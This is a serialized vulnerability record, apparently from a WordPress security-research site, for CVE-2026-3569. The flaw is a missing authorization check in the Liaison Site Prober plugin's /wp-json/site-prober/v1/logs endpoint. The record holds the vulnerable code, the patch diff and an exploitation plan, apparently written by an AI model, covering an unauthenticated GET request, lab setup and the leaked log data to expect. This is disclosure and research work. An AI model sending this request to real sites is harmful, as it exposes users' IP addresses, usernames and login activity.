[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$foJ1-TkXCOVwmlEQI-c9rSS1AXSfJxUey2EDJ-PU2gSI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":30,"research_vulnerable_code":31,"research_fix_diff":32,"research_exploit_outline":33,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":37},"CVE-2026-3569","liaison-site-prober-missing-authorization-to-unauthenticated-information-exposure-in-logs-rest-api-endpoint","Liaison Site Prober \u003C= 1.2.1 - Missing Authorization to Unauthenticated Information Exposure in '\u002Flogs' REST API Endpoint","The Liaison Site Prober plugin for WordPress is vulnerable to Information Exposure in all versions up to and including 1.2.1 via the \u002Fwp-json\u002Fsite-prober\u002Fv1\u002Flogs REST API endpoint. The permissions_read() permission callback unconditionally returns true (via __return_true()) instead of checking for appropriate capabilities. This makes it possible for unauthenticated attackers to retrieve sensitive audit log data including IP addresses, user IDs, usernames, login\u002Flogout events, failed login attempts, and detailed activity descriptions.","liaison-site-prober",null,"\u003C=1.2.1","1.2.2","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","Missing Authorization","2026-04-23 19:17:51","2026-04-24 07:45:08",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Feda5addb-40e2-4187-b803-34500b36be0a?source=api-prod",1,[22,23,24,25],"README.txt","includes\u002Fclass-liaison-rest-controller.php","includes\u002Fclass-liaison-site-prober-list-table.php","liaison-site-prober.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-3569 (Liaison Site Prober)\n\n## 1. Vulnerability Summary\nThe **Liaison Site Prober** plugin for WordPress (versions \u003C= 1.2.1) contains a missing authorization vulnerability within its REST API implementation. The endpoint `\u002Fwp-json\u002Fsite-prober\u002Fv1\u002Flogs` is intended to provide audit logs to administrative users. However, the `permissions_read()` method in `LIAISIPR_REST_Controller` explicitly returns `true` via the WordPress core function `__return_true()`, bypassing any capability or authentication checks. This allows unauthenticated attackers to view sensitive site activity logs, including user IDs, IP addresses, and detailed action descriptions.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-json\u002Fsite-prober\u002Fv1\u002Flogs`\n- **Method:** `GET` (as defined by `WP_REST_Server::READABLE`)\n- **Authentication:** None required (Unauthenticated).\n- **Parameters:**\n  - `plugin` (string, optional): Defined in routes but ignored by the current `get_logs` implementation.\n  - `limit` (integer, optional): Defined in routes but ignored by the current `get_logs` implementation.\n- **Preconditions:** The plugin must be active. Logs must exist in the custom database table (usually populated automatically upon plugin activation and standard site usage).\n\n## 3. Code Flow\n1. **Route Registration:** In `includes\u002Fclass-liaison-rest-controller.php`, the `register_routes()` method defines the `\u002Flogs` route under the `site-prober\u002Fv1` namespace.\n2. **Permission Callback:** The route is configured with `'permission_callback' => [ $this, 'permissions_read' ]`.\n3. **The Vulnerable Sink:** The `permissions_read()` method is implemented as follows:\n   ```php\n   public function permissions_read() {\n       return __return_true(); \u002F\u002F This allows anyone to access the callback\n       \u002F\u002Freturn current_user_can( 'read' );\n   }\n   ```\n4. **Data Retrieval:** Upon a successful permission check (which is always true), the `get_logs()` method is called:\n   - It accesses the global `$wpdb` and the custom table `$wpdb->wpsp_activity`.\n   - It executes a `SELECT` query for `id, created_at, user_id, ip, action, object_type, description`.\n   - It returns the results as a JSON response.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability does not require a WordPress nonce. \n- WordPress REST API `GET` requests generally do not require a `_wpnonce` header if the `permission_callback` does not check for user capabilities or the `wp_rest` nonce specifically.\n- Since `permissions_read` returns `true` unconditionally, the request will be processed regardless of the presence or validity of a nonce.\n\n## 5. Exploitation Strategy\nThe goal is to retrieve the activity logs without any credentials.\n\n**Step 1: Discover the REST API Prefix**\nDetermine the REST API base URL (usually `\u002Fwp-json\u002F`).\n\n**Step 2: Execute the Exploit Request**\nUse the `http_request` tool to send a `GET` request to the vulnerable endpoint.\n\n- **Request URL:** `http:\u002F\u002F\u003Ctarget-ip>:\u003Cport>\u002Fwp-json\u002Fsite-prober\u002Fv1\u002Flogs`\n- **Method:** `GET`\n- **Headers:** \n  - `Accept: application\u002Fjson`\n\n**Step 3: Analyze Response**\nThe expected response is a JSON object containing a `logs` array.\n\n## 6. Test Data Setup\nTo ensure the exploit returns meaningful data, the target environment should have recorded some activity:\n1. **Install and Activate Plugin:** Use `wp-cli` to install version 1.2.1.\n2. **Generate Logs:**\n   - Log in and out of the WordPress admin.\n   - Create a dummy post: `wp post create --post_title=\"Audit Target\" --post_status=publish`.\n   - Update a post: `wp post update 1 --post_content=\"Modified content\"`.\n   - These actions populate the `wpsp_activity` table.\n3. **Verify Table Content (Internal):** `wp db query \"SELECT * FROM wp_wpsp_activity\"` (to confirm logs exist before testing external exposure).\n\n## 7. Expected Results\nA successful exploit will return a `200 OK` response with a body similar to:\n```json\n{\n  \"count\": 3,\n  \"logs\": [\n    {\n      \"id\": \"3\",\n      \"created_at\": \"2023-10-27 10:00:00\",\n      \"user_id\": \"1\",\n      \"ip\": \"192.168.1.100\",\n      \"action\": \"updated\",\n      \"object_type\": \"post\",\n      \"description\": \"Post updated: Audit Target\"\n    },\n    {\n      \"id\": \"2\",\n      \"created_at\": \"2023-10-27 09:55:00\",\n      \"user_id\": \"1\",\n      \"ip\": \"192.168.1.100\",\n      \"action\": \"login\",\n      \"object_type\": \"user\",\n      \"description\": \"User logged in: admin\"\n    }\n  ]\n}\n```\n\n## 8. Verification Steps\n1. **Compare JSON Output with Database:** Use `wp-cli` to check the content of the `wpsp_activity` table and verify it matches the JSON returned by the REST API.\n   ```bash\n   wp db query \"SELECT * FROM wp_wpsp_activity\" --list\n   ```\n2. **Confirm Unauthenticated Access:** Verify the `http_request` was made without any `Cookie` or `Authorization` headers.\n\n## 9. Alternative Approaches\nIf the standard `\u002Fwp-json\u002F` prefix is changed by a security plugin, attempt to find the REST API endpoint using the `Link` header from the homepage:\n1. `GET \u002F`\n2. Look for `Link: \u003Chttp:\u002F\u002Ftarget\u002Fwp-json\u002F>; rel=\"https:\u002F\u002Fapi.w.org\u002F\"`.\n\nIf the endpoint returns an empty list, ensure the `wpsp_activity` table is correctly defined. The table name is stored in `$wpdb->wpsp_activity`. Check its name using:\n```bash\nwp eval \"global \\$wpdb; echo \\$wpdb->wpsp_activity;\"\n```\nIf the table is empty, trigger more actions (e.g., failed login attempts) to populate it.","The Liaison Site Prober plugin for WordPress is vulnerable to unauthenticated information exposure via its REST API. The `\u002Fwp-json\u002Fsite-prober\u002Fv1\u002Flogs` endpoint lacks proper authorization because its permission callback is set to unconditionally return true, allowing anyone to view sensitive audit logs including user IDs, IP addresses, and site activity details.","\u002F\u002F includes\u002Fclass-liaison-rest-controller.php line 49\npublic function permissions_read() {\n    return __return_true();\n    \u002F\u002Freturn current_user_can( 'read' );\n}\n\n---\n\n\u002F\u002F includes\u002Fclass-liaison-rest-controller.php line 11\npublic function register_routes() {\n\n    register_rest_route(\n        self::NAMESPACE,\n        '\u002Flogs',\n        [\n            [\n                'methods'             => WP_REST_Server::READABLE,\n                'callback'            => [ $this, 'get_logs' ],\n                'permission_callback' => [ $this, 'permissions_read' ],\n                \u002F\u002F ...","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fliaison-site-prober\u002F1.2.0\u002Fincludes\u002Fclass-liaison-rest-controller.php\t2026-01-30 08:10:58.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fliaison-site-prober\u002F1.2.2\u002Fincludes\u002Fclass-liaison-rest-controller.php\t2026-03-12 09:58:30.000000000 +0000\n@@ -47,8 +47,7 @@\n      * ----------------------------------------------------------------- *\u002F\n \n     public function permissions_read() {\n-        return __return_true();\n-        \u002F\u002Freturn current_user_can( 'read' );\n+        return current_user_can( 'manage_options' );\n     }\n \n     public function permissions_write() {","The exploit is a simple unauthenticated GET request to the plugin's REST API endpoint. \n\n1. Target Endpoint: \u002Fwp-json\u002Fsite-prober\u002Fv1\u002Flogs\n2. Method: GET\n3. Authentication: None required. The plugin's permissions_read() function returns __return_true(), which bypasses WordPress's standard REST API capability checks.\n4. Payload: No specific payload or nonce is required. A standard HTTP GET request to the endpoint will return a JSON object containing the 'logs' array from the custom `wpsp_activity` database table, exposing IP addresses, user IDs, and activity descriptions.","gemini-3-flash-preview","2026-04-27 13:31:59","2026-04-27 13:32:39",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","1.2.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fliaison-site-prober\u002Ftags\u002F1.2.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fliaison-site-prober.1.2.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fliaison-site-prober\u002Ftags\u002F1.2.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fliaison-site-prober.1.2.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fliaison-site-prober\u002Ftags"]